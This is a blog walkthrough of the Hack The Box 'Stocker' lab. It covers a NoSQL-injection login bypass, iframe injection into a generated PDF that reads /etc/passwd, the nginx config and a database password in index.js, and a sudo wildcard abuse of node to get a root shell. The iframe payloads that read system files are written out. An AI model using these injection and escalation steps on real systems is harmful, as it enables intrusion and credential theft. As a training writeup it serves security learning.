IT and security stuff

HTB – Stocker Writeup

Recon

Nmap

Directory listing

Nothing of interest…

The web app

Entering the ip as URL redirects to stocker.htb, let’s add it to our hosts file
Found nothing of interest on the web app.. Let’s enumerate sub-domains.
Found dev as a sub-domain! Let’s add it to the hosts file.
I tried various authentication bypass such ass default creds and SQLi and it did not work. The next step is to try NoSQL injection as found on https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection#post-with-json-bodylTheThings

Exploit

Auth Bypass

In data did not work so I tried in JSON.
It worked as I am redirected to /stock

PDF Injection

Clicking “here” brings us to a Purchase Order in PDF

The following is the request that was done to puchase an Axe

Let’s try changing some values to see what we can control
Changed Axe for EVIL in the POST Request
Looking at the console we can see the app

A quick google search lead me here : https://www.triskelelabs.com/blog/extracting-your-aws-access-keys-through-a-pdf-file

Apparently we can inject XSS in the PDF potentially leading to SSRF(where we can read files)
The Skia/PDF module is vulnerable to IFrame XSS.
<iframe src=/etc/passwd height=1000 width=1000></iframe>
Users angoose and mongodb revealed a mongo DB is in place.

Maybe we can get info from the Database

<iframe src=/etc/nginx/nginx.conf height=1000 width=1000></iframe>
/etc/nginx/nginx.conf revealed the root of the web app to be /var/www/dev/

Let’s see if I can find any interesting files in that directory!

/var/www/dev/index.js
Found the DB password

Foothold/User

The password worked for user angoose
I can run /usr/bin/node /usr/local/scripts/*.js with sudo. That’s an e asy one!

Root

From GTFOBins
Create a js file that will spawn a shell.

Since there is a wildcard in /usr/bin/node /usr/local/scripts/*.js we can put anything:

I AM ROOT!

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.